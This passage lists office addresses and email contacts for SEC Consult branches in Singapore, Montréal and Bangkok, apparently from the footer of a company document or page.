4 Battery Road #25-01, Bank of China Building, Singapore (049908)
Email office-singapore@sec-consult.com

CANADA
i-SEC Consult Inc.
100 René-Lévesque West, Suite 2500, Montréal (Quebec) H3B 5C9
Email office-montreal@sec-consult.com

THAILAND
SEC Consult (Thailand) Co.,Ltd.
29/1 Piyaplace Langsuan Building, 16th Floor, 16B, Soi Langsuan, Ploen Chit Road, Lumpini, Patumwan | Bangkok 10330
Email office-vilnius@sec-consult.com

www.sec-consult.com
